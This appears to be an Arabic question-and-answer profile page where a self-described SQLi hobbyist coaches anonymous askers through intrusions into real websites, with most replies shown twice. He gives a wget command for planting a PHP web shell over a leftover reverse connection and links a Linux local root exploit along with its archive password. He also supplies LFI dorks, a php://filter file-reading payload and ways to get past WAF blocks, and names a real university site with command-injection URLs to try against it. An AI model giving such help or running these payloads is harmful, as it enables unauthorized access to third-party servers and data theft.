If you could have anything you want for dinner tonight, what would you have?
Potatos with Mayonnaise From Arabiata xD
Liked by:
KàRim Ëł
Ask @ElSyad
Previous
السلام عليكم اخي كيف بقدر اعمل سكربت تخمين لموقع معين واناا عندي خبر في ال php بس مش عارف كيف اتعامل مع المتصفح في عندك فيديوهات لهاد الاشي ؟
بسيطة يا غالى
من اى شرح تخمين على اى سكربت
شوف السكربت اللى بيعمل التخمين من خلاله
وشوف اكواده وهتفهم
بالتوفيق
من اى شرح تخمين على اى سكربت
شوف السكربت اللى بيعمل التخمين من خلاله
وشوف اكواده وهتفهم
بالتوفيق
Liked by:
KàRim Ëł
عندك سكربت فرز للايميلات الهوتميل لحال والياهو لحال ز....ز الخ
لا يا برنس مش عندى
تلاقى عند السبامرز اكتر
وممكن تدور بموقع Pastebin
بالتوفيق
تلاقى عند السبامرز اكتر
وممكن تدور بموقع Pastebin
بالتوفيق
Liked by:
KàRim Ëł
People you may like
اخي في كنت رافع شل على موقع والشل انحذف بس اناا كنت عامل اتصال عكسي مع السيرفر ولساتو الاتصال شغال بقدر ارفع كمان مرة الشل عن طريق الاتصال العكس ؟؟ وكيف ؟؟
اهلا بيك
المفروض انه بيتم قفل الاتصال اول ما تقفل الصفحة
بس الظاهر انك كنت متصل لما تم حذف الشل عشان كده حظك حلو
المهم لو صلاحياتك User ممكن ببساطة تتنقل لاى مجلد
او تعملك مجلد جديد بالامر mkdir egy
هنا بقى عندنا مجلد اسمه egy خش عليه من خلال امر التنقل cd egy
وبعدها هتسحب شل بامتداد txt وتحوله بعدها لامتداد php
من خلال امر السحب
wget http://www.site.com/shell.txt ; mv shell.txt shell.php
او ممكن نختصر الامر اللى فوق بالامر التالى برضو وهيتم تنفيذ المطلوب برضو
wget http://www.site.com/shell.txt -O shell.php
وبعدها استعرض الشل بتاعك من Broswer عادى يا برنس
بالتوفيق
المفروض انه بيتم قفل الاتصال اول ما تقفل الصفحة
بس الظاهر انك كنت متصل لما تم حذف الشل عشان كده حظك حلو
المهم لو صلاحياتك User ممكن ببساطة تتنقل لاى مجلد
او تعملك مجلد جديد بالامر mkdir egy
هنا بقى عندنا مجلد اسمه egy خش عليه من خلال امر التنقل cd egy
وبعدها هتسحب شل بامتداد txt وتحوله بعدها لامتداد php
من خلال امر السحب
wget http://www.site.com/shell.txt ; mv shell.txt shell.php
او ممكن نختصر الامر اللى فوق بالامر التالى برضو وهيتم تنفيذ المطلوب برضو
wget http://www.site.com/shell.txt -O shell.php
وبعدها استعرض الشل بتاعك من Broswer عادى يا برنس
بالتوفيق
Liked by:
KàRim Ëł
ممكن اخي شرح استهداف المواقع من الصفر حتى رفع *-*
Liked by:
KàRim Ëł
طيب اخي شو باسورد الملف المضغوط تبع اللوكل ؟؟؟
harD
لو محتاجه تانى ممكن ارفعهولك
لو محتاجه تانى ممكن ارفعهولك
السلام عليكم في عندك هاد 2.6.28.8 local root exploit ؟؟؟؟ الوكل روت تبعو 2009
جرب اللوكال ده يا برنس
http://www.gulfup.com/?805g9U
لسه رافعه ليك حالا
والاصدار ده منتشر كتير اوى
ممكن تجرب اى اصدار احدث كمان عادى مفيش مشاكل يعنى ممكن تجرب
2010 و 2011
http://www.gulfup.com/?805g9U
لسه رافعه ليك حالا
والاصدار ده منتشر كتير اوى
ممكن تجرب اى اصدار احدث كمان عادى مفيش مشاكل يعنى ممكن تجرب
2010 و 2011
هل محترفين الهكر هما محترفين الحقن اليدوي مع تخطي مشاكل الحقن اليدوي و هل يوجد محترف هكر مش محترف الحقن اليدوي ؟ وانت بتعرف تحقن يدوي وتتخطى الحماياات ومشاكل الحقن اليدوي ؟؟
اهلا بيك
نبتدى على بركة الله بجزء جزء
هل محترفين الهكر هما محترفين الحقن اليدوي ؟
لا مش لازم يا برنس
هل يوجد محترف هكر مش محترف الحقن اليدوي ؟
فى كتير يا ريس بس بيبقى عنده معرفة بالحقن اليدوى لتخطى مشاكله والامور التانية
وانت بتعرف تحقن يدوي وتتخطى الحماياات ومشاكل الحقن اليدوي ؟؟
والله انا فى 2013 اول ما دخلت المجال ده كنت مدمن ثغرات SQli بس بعد كده بديت اوسع معرفتى بالثغرات التانية
وانا من عاشقى sqli
وتقدر تقول عليا مبتدأ بدرجة فى ثغرات Sqli
الحمد لله يعنى اى موقع كان مصاب معايا واجهتنى حمايات قدرت اتخطاها وساعات بمساعدة ناس خبرة فى مجال sqli
بالتوفيق
نبتدى على بركة الله بجزء جزء
هل محترفين الهكر هما محترفين الحقن اليدوي ؟
لا مش لازم يا برنس
هل يوجد محترف هكر مش محترف الحقن اليدوي ؟
فى كتير يا ريس بس بيبقى عنده معرفة بالحقن اليدوى لتخطى مشاكله والامور التانية
وانت بتعرف تحقن يدوي وتتخطى الحماياات ومشاكل الحقن اليدوي ؟؟
والله انا فى 2013 اول ما دخلت المجال ده كنت مدمن ثغرات SQli بس بعد كده بديت اوسع معرفتى بالثغرات التانية
وانا من عاشقى sqli
وتقدر تقول عليا مبتدأ بدرجة فى ثغرات Sqli
الحمد لله يعنى اى موقع كان مصاب معايا واجهتنى حمايات قدرت اتخطاها وساعات بمساعدة ناس خبرة فى مجال sqli
بالتوفيق
اوككككككك اوك مصابة هو في ثغرة تانية ان شاء الله يشتغل عليها وشكرا :* :*
ولا يهمك يا برنس
احنا دايما فى الخدمة
الشكر لله وحده
بالتوفيق
احنا دايما فى الخدمة
الشكر لله وحده
بالتوفيق
تفضل يابرنس http://im88.gulfup.com/KgRH9b.png
اهلا بيك
هو هنا بيقولك ان احتمال يكون فيه ثغرة lfi
طيب تمام بس لازم تجيب المتغير اللى انت هتشتغل عليه
ودى محتاجة انك تشوف الملف المصاب يعنى محتاج تنزل السكربت وتقرأ الكود
ممكن يكون مصاب وممكن يكون مش مصاب
شوف ثغرة غيرها اضمن يا برنس
هو هنا بيقولك ان احتمال يكون فيه ثغرة lfi
طيب تمام بس لازم تجيب المتغير اللى انت هتشتغل عليه
ودى محتاجة انك تشوف الملف المصاب يعنى محتاج تنزل السكربت وتقرأ الكود
ممكن يكون مصاب وممكن يكون مش مصاب
شوف ثغرة غيرها اضمن يا برنس
والله يا اخي مش عارف ليش اناا بلاقي ثغرات بس مشكلتي في الاستغلال يعني مثلا اكيد بتصير معك يعني مابلاقي ثغرة sql في الهدق ويكون استغلالهاا سهل بلاقيها blind method post بدي استغلال لهاد النوع وتخطي مشاكل الحقن والحقن يدوي في ال post صعب وعمري ماسمعت عنو صراحة
اهلا بيك
ده من الطبيعى يا ريس ههه
اما بخصوص sql Post
ده بيتم من خلال اى اداة تقدر من خلالها وظيفتها Request Editor
زى مثلا
live headers
BurpSuit
ومن خلالهم تقدر تنفذ اوامر عادى جدا
او ببساطة ممكن تشتغل باداة sqlmap
او من الHavij
اكتب بجوجل " sql injection post via sqlmap "
او اى عبارات زى كده
وانا هحاول اعمل درس ليها بكذا اداة عشان نبقى منوعين ههه
ده من الطبيعى يا ريس ههه
اما بخصوص sql Post
ده بيتم من خلال اى اداة تقدر من خلالها وظيفتها Request Editor
زى مثلا
live headers
BurpSuit
ومن خلالهم تقدر تنفذ اوامر عادى جدا
او ببساطة ممكن تشتغل باداة sqlmap
او من الHavij
اكتب بجوجل " sql injection post via sqlmap "
او اى عبارات زى كده
وانا هحاول اعمل درس ليها بكذا اداة عشان نبقى منوعين ههه
السلام عليكم اخي عندي موقع فصحتو في الفيجا بحكيلي انو مصاب بثغرة ال lfi كيف بدي اتاكد من اصابتو
اهلا بيك
حط صورة يا برنس احسن
كمثال
https://support.subgraph.com/images/scanner/AlertRequestLink.png
حط صورة يا برنس احسن
كمثال
https://support.subgraph.com/images/scanner/AlertRequestLink.png
اهلا يابرنس سؤالى ازاى اخترق منتديات احلى منتدى فيه منتدى بيشتمنى وبيعاملونى وحش وطردونى من هناك وتحدونى انى اخترقهم فياريت تديلى طريقة حلوة كدة وشكرا ليك يابرنس
اهلا بيك
يا ريس دى منتديات مجانية
يعنى حتى لا شكل ولا اى حاجة كويسة فيها
على العموم افتكر ان المنتديات بتاعتهم بتكون مركبة سكربت phpbb
مش فاكر اوى يعنى بصراحة
جرب ثغرات السكربت لو طلع هو عليهم
او احسن حل
نفض لهم يا برنس وشوف حجات اهم منهم
يا ريس دى منتديات مجانية
يعنى حتى لا شكل ولا اى حاجة كويسة فيها
على العموم افتكر ان المنتديات بتاعتهم بتكون مركبة سكربت phpbb
مش فاكر اوى يعنى بصراحة
جرب ثغرات السكربت لو طلع هو عليهم
او احسن حل
نفض لهم يا برنس وشوف حجات اهم منهم
كيف يعني php filter
اهلا بيك
php://filter/convert.base64-encode/resource=filename
مكان filename
حط اسم الملف اللى عاوز تقرأه
بالتوفيق
php://filter/convert.base64-encode/resource=filename
مكان filename
حط اسم الملف اللى عاوز تقرأه
بالتوفيق
كنت استدعي ملف etc/passwd
حاول تستخدم php Filter يا برنس
وجرب مرة كمان
وجرب مرة كمان
انت خلاص بقيت شبح ومحدش عارف يكلمك B| لو عرفت انا مين تبقي انت برنس يسطا :"D
أكيد محمد صلاح ههه
اخي بتواجهني مشكلة Not Acceptable! ثغرة lfi ^_^
اهلا بيك
يعنى انت كنت بتحاول تستدعى ملف وجابلك الحماية دى ؟
ولا امتى بالظبط بتجيلك ؟؟
يعنى انت كنت بتحاول تستدعى ملف وجابلك الحماية دى ؟
ولا امتى بالظبط بتجيلك ؟؟
طيب الفوربدن شو حلها ؟!!
فى كذا حل يا برنس
ممكن تشفر الاوامر زى ما قولت قبل كده
حاول تلعب فى الاوامر شوية يعنى حرف صغير وحرف كبير
حاول تشفر الامر كذا مرة يعنى مش مرة واحدة
فكر يا برنس
ممكن تشفر الاوامر زى ما قولت قبل كده
حاول تلعب فى الاوامر شوية يعنى حرف صغير وحرف كبير
حاول تشفر الامر كذا مرة يعنى مش مرة واحدة
فكر يا برنس
كل عام وانت بخير وشكرا الك ❤️
وانت بخير يا ريس وتسلم على زوقك
مازبط مابجيبلي شي :/ https://ritaj.birzeit.edu/university-laws/delete-attachment?node_id=bHM=
هو ايه اللى انت حاطه اصلا يا برنس ؟
مثلا تشفير امر id بتشفيرة Base64
https://ritaj.birzeit.edu/university-laws/delete-attachment?node_id=`aWQ=`
بس المشكلة ان فى حماية Forbidden
مثلا تشفير امر id بتشفيرة Base64
https://ritaj.birzeit.edu/university-laws/delete-attachment?node_id=`aWQ=`
بس المشكلة ان فى حماية Forbidden
وكل عام وانت بالف خير يابرنس وينعاد علينا وعليك بالصحة والسلامة
وعليكم ان شاء الله
تسلم يا غالى
تسلم يا غالى
سامحني بس كيف بقدر اشفر الامر بال base64 وممكن مثال ؟
اهلا بيك
ببساطة ممكن من خلال اى موقع بيعمل الخدمة دى اونلاين ودول كتير
ممكن كمثال الموقع البسيط ده
https://www.base64decode.org/
او ممكن من خلال اى اداة بتعمل الخدمة نفسها زى Coder
او ممكن من خلال اضافة فى الفايرفوكس اسمها HackBar
وحجات كتيرة يا ريس
ببساطة ممكن من خلال اى موقع بيعمل الخدمة دى اونلاين ودول كتير
ممكن كمثال الموقع البسيط ده
https://www.base64decode.org/
او ممكن من خلال اى اداة بتعمل الخدمة نفسها زى Coder
او ممكن من خلال اضافة فى الفايرفوكس اسمها HackBar
وحجات كتيرة يا ريس
اخي ممكن دوركات لثغرة lfi
لو كتبت فى جوجل هتلاقى كتير
بس دول كبداية
php?action= , php?file=
يعنى عشان تعمل Test لثغرة lfi
ممكن بعد اى متغير زى اللى فوق كمثال يعنى
تكتب اى حاجة مثلا ElSyad
اذا ظهرلك خطأ Include , Require والدوال اللى انا وضحتها فى الرد اللى قبل ده
يبقى الموقع مصاب بالثغرة
بالتوفيق
بس دول كبداية
php?action= , php?file=
يعنى عشان تعمل Test لثغرة lfi
ممكن بعد اى متغير زى اللى فوق كمثال يعنى
تكتب اى حاجة مثلا ElSyad
اذا ظهرلك خطأ Include , Require والدوال اللى انا وضحتها فى الرد اللى قبل ده
يبقى الموقع مصاب بالثغرة
بالتوفيق
زي هيك كيف بقدر استغل الثغرة ؟ http://im58.gulfup.com/M7z4RW.png
اهلا بيك
التطبيق يا برنس بيكون زى ما قولنا تنفيذ اوامر وطبعا على حسب نوع السيرفر
فى الموقع اللى عندك انت
حاول تخش على الرابط ده
https://ritaj.birzeit.edu/images/Ritaj.gif?20141018=`id`
هتلاقى حماية بوشك Forbidden
حاول تشفر الامر بتشفيرة Base64 وجربه تانى
لانى مش على جهازى للاسف
وعشان تفهم اكتر
تابع ردى بالرابط التالى
http://www.hack-ar.com/cc/showpost.php?p=163654&postcount=8
بالتوفيق
التطبيق يا برنس بيكون زى ما قولنا تنفيذ اوامر وطبعا على حسب نوع السيرفر
فى الموقع اللى عندك انت
حاول تخش على الرابط ده
https://ritaj.birzeit.edu/images/Ritaj.gif?20141018=`id`
هتلاقى حماية بوشك Forbidden
حاول تشفر الامر بتشفيرة Base64 وجربه تانى
لانى مش على جهازى للاسف
وعشان تفهم اكتر
تابع ردى بالرابط التالى
http://www.hack-ar.com/cc/showpost.php?p=163654&postcount=8
بالتوفيق
السلام عليكم فحصت موقع وطلعي انو مصاب في ثغرة shell injection شو هاي الثغرة وكيف بقدر استغلها ؟؟؟ هي الصورة http://im62.gulfup.com/yQQJMJ.png
اهلا بيك
ثغرات Shell Injection
هيا ثغرات بيتم استغلالها فى تطبيق اوامر لحقن شل
الدوال المصابة هيا نفسها دوال تنفيذ الاوامر بلغة php
بس بخصوص حدوث الثغرة دى اكتر دالة بيتم استخدامها والله اعلم
shell_exec
ممكن تعرف اكتر عن الدالة من خلال موقع php.net
بخصوص التطبيق هرد عليك فى السؤال التانى
ثغرات Shell Injection
هيا ثغرات بيتم استغلالها فى تطبيق اوامر لحقن شل
الدوال المصابة هيا نفسها دوال تنفيذ الاوامر بلغة php
بس بخصوص حدوث الثغرة دى اكتر دالة بيتم استخدامها والله اعلم
shell_exec
ممكن تعرف اكتر عن الدالة من خلال موقع php.net
بخصوص التطبيق هرد عليك فى السؤال التانى
Next
